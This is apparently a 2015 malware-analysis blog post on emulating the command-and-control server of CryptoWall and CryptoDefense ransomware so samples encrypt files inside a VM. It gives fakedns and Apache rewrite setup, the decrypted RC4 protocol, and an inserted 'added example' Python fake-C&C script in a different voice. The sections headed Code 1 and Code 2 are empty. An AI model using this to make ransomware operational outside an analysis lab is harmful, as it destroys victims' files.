Tuesday, March 10, 2015

Getting CryptoWall and CryptoDefense working without C&C

It's common to find malware samples that need the C&C to work. This is the case of the CryptoWall and CryptoDefense ransomware families. If you need to debug samples of these families you will usually find the C&C down, so the ransomware won't work and won't encrypt files: it will only try to connect to the C&C continuously.

In this article I'm going to describe a way to create a fake C&C for the CryptoWall and CryptoDefense families, and how to get samples of these families working inside a VMware VM, for example.

First, we need to redirect every connection the ransomware makes to our server. Depending on the sample they connect to different domains, so we need to redirect any connection, whatever the domain, to our fake server.

We will use metasploit's fakedns module for this purpose:

msf > use auxiliary/server/fakedns
msf auxiliary(fakedns) > set TARGETACTION FAKE
TARGETACTION => FAKE
msf auxiliary(fakedns) > set TARGETDOMAIN *
TARGETDOMAIN => *
msf auxiliary(fakedns) > set TARGETHOST 192.168.2.2
TARGETHOST => 192.168.2.2

With these commands we create a DNS server that resolves any query to 192.168.2.2. An Apache server will be running at that IP address.

Second, we need to redirect any request to our HTTP server (whatever the URI) to the same document. We can do this by adding these lines to httpd.conf:

RewriteEngine On
RewriteCond %{REQUEST_URI} !^/index.php
RewriteRule . /index.php

Now we can implement the PHP that gives the ransomware the responses it needs to work.

CryptoWall


CryptoWall uses a query/response mechanism to communicate with the C&C, and the communications are encrypted with RC4. The CryptoWall client connects to the C&C's HTTP server. The URI is the RC4 key with its characters in random order (it is necessary to sort them in ascending order). The client sends the query's data via POST. So, to decrypt it, you take the RC4 key from the URI, sort it, and decrypt the POST content.

Example query:

8    0.218529    192.168.204.235    141.255.167.3    HTTP    156    POST /w72sh29mlo HTTP/1.1  (application/x-www-form-urlencoded)
w=c13314ada7ed648b9919aeff2306e02241242601e0744aa69304d98065c43670fca844aa579d9ab44f3c1bd89231b9351c34
Here we can see a complete communication extracted from a pcap file:
Q:nvawc5uxnp,3de9a8c4e00c59e80a58059f17cdab179e740ac0337b673dd50e7499b43ea13c1c37d8def042e12d520b49da59650016c9
R:nvawc5uxnp,3deae595eb0f14
Q:ylrq5msbpctg,30c51f5e25a1f0346aa429e82c9db310dbdc13c8a8d11f93e3b8a734aeb90a295f4a01219bf164ce59b57591

The string before the comma is the RC4 key; the string after the comma is the POST data.

We can decrypt it with the script in the section Code 1 at the end of this article.

The decrypted queries/responses:

query:{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}
response:{212|1}
query:{7|cw200|99DC835DFC77319C2176AB46302136BF|4}
response:{250|kpai7ycr7jxqkilp.onion|75a5|ES|-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq6ZEGywe2wC83CErmVhB
gn89wi2lq8rQyYZZGCUyQr5cQirN32HX5n6MNcJDjB8uINSosaHHGdCPUeOoetx9
IM3TiXZwwSnteGR+gBry/C7dr3JSAWrnLE+TkeO6mrQ8yUtaZ3ue7XSyvV457jLz
Lg1noHcLL/RXNKsP0MmbZW1yHvRulsuy5XW6clQqNMMmfAAT8y+UwePL7M0YG86q
SP9QQFB3B+FdlRJ/8VlN3Sva1JeXJbxGcbmowwtJEJVZtAuf9c7sDv5Kt1tlH8Z2
VXjg4P2Dw3KUg/7pcfL18SAEfsRBIONFvLNcrVdh0/W5aVh6/9djcnMiCV61CYkS
7wIDAQAB
-----END PUBLIC KEY-----}

We only need to imitate this communication with our PHP to get CryptoWall working.
You can find a functional PHP file in the section Code 2 at the end of this article.

CryptoDefense


CryptoDefense communications are very similar to CryptoWall's: it uses the same query/response mechanism encrypted with RC4, so we can use the same Python script to decrypt them. Here is a sample decrypted communication:

query:{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}
response:{212|1}

With CryptoDefense we only need to respond with an "OK" response to the client and it starts encrypting.
The PHP file in the section Code 2 at the end of this article works for both CryptoWall and CryptoDefense.
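
Putting the two halves together, here is an added Python 3 example (not the article's own Code 1 or Code 2) that covers both the decryption procedure described in the CryptoWall section and the reply logic a fake C&C needs for the two exchanges shown above. It assumes the RC4 key is the URI path with its characters sorted by byte value ("growing order"), that the POST field is named w as in the capture, and that the HTTP response body is the hex-encoded RC4 ciphertext produced with the same key. The onion address, id, country and public key in the type-7 reply are placeholders to replace with values you generate yourself. The keystream check uses only the captured query/response pair and the decrypted query quoted above, so it confirms that both directions of the capture share one key before you rely on the key derivation.

```python
"""Added example: RC4 handling for CryptoWall/CryptoDefense traffic and a
fake-C&C reply builder for the two exchanges shown in the article.
Assumptions (not stated as fact by the article): the key is the URI path
sorted by byte value, the POST field is "w", and the reply body is the
hex-encoded ciphertext made with the same key."""
from typing import Optional
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                           # keystream generation XORed into data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def key_from_uri(uri: str) -> bytes:
    """The URI path is the RC4 key with its characters shuffled; the article says
    to put them back in ascending order (assumption: plain byte order)."""
    path = uri.strip("/").split("?", 1)[0]
    return "".join(sorted(path)).encode()


def decrypt_message(uri: str, hex_payload: str) -> bytes:
    """Decrypt the hex-encoded value of the POST field (the 'w' parameter)."""
    return rc4(key_from_uri(uri), bytes.fromhex(hex_payload))


def encrypt_message(uri: str, plaintext: bytes) -> str:
    """Encrypt a message with the same key and hex-encode it, as the C&C does."""
    return rc4(key_from_uri(uri), plaintext).hex()


def keystream_from_known_plaintext(hex_cipher: str, plaintext: bytes) -> bytes:
    """Recover keystream bytes from one ciphertext whose plaintext is known.
    Query and response share the key, so they share the keystream: this lets you
    check a capture is consistent without trusting the key derivation."""
    return bytes(c ^ p for c, p in zip(bytes.fromhex(hex_cipher), plaintext))


def xor_with_keystream(hex_cipher: str, keystream: bytes) -> bytes:
    """Apply a recovered keystream to another ciphertext (truncates to its length)."""
    return bytes(c ^ k for c, k in zip(bytes.fromhex(hex_cipher), keystream))


# Captured exchange quoted in the article (URI key "nvawc5uxnp") and its decrypted query.
CAPTURED_URI = "/nvawc5uxnp"
CAPTURED_QUERY = ("3de9a8c4e00c59e80a58059f17cdab179e740ac0337b673dd50e7499b43ea13c"
                  "1c37d8def042e12d520b49da59650016c9")
CAPTURED_RESPONSE = "3deae595eb0f14"
CAPTURED_QUERY_PLAIN = b"{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}"

# Placeholders for the fields of the type-7 reply shown in the article; replace the
# key with a PEM public key you generate yourself before detonating a sample.
PLACEHOLDER_ONION = b"PLACEHOLDER.onion"
PLACEHOLDER_ID = b"0000"
PLACEHOLDER_COUNTRY = b"XX"
PLACEHOLDER_PUBKEY = b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDER\n-----END PUBLIC KEY-----"


def fake_cnc_reply(uri: str, hex_query: str) -> Optional[str]:
    """Build the encrypted reply body for the two message types in the article's
    capture: a type-1 query gets {212|1}, a type-7 query gets a {250|...} record.
    Returns None for anything unparseable or not covered so the caller can log it."""
    plain = decrypt_message(uri, hex_query)
    m = re.match(rb"\{(\d+)\|", plain)
    if m is None:
        return None
    msg_type = int(m.group(1))
    if msg_type == 1:
        reply = b"{212|1}"
    elif msg_type == 7:
        fields = [PLACEHOLDER_ONION, PLACEHOLDER_ID, PLACEHOLDER_COUNTRY, PLACEHOLDER_PUBKEY]
        reply = b"{250|" + b"|".join(fields) + b"}"
    else:
        return None
    return encrypt_message(uri, reply)


if __name__ == "__main__":
    # Decrypt the captured query, then show the keystream consistency check on the reply.
    print(decrypt_message(CAPTURED_URI, CAPTURED_QUERY).decode("ascii", "replace"))
    ks = keystream_from_known_plaintext(CAPTURED_QUERY, CAPTURED_QUERY_PLAIN)
    print(xor_with_keystream(CAPTURED_RESPONSE, ks).decode("ascii", "replace"))
```

To use it behind the Apache rewrite above, whatever serves index.php reads the request path and the w field, calls fake_cnc_reply, and writes the returned hex string as the response body; a None result is worth logging, since it means the sample sent a message type this emulation does not know about.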


Code 1. Python script to decrypt CryptoWall communications



Code 2. PHP fake CryptoWall/CryptoDefense server

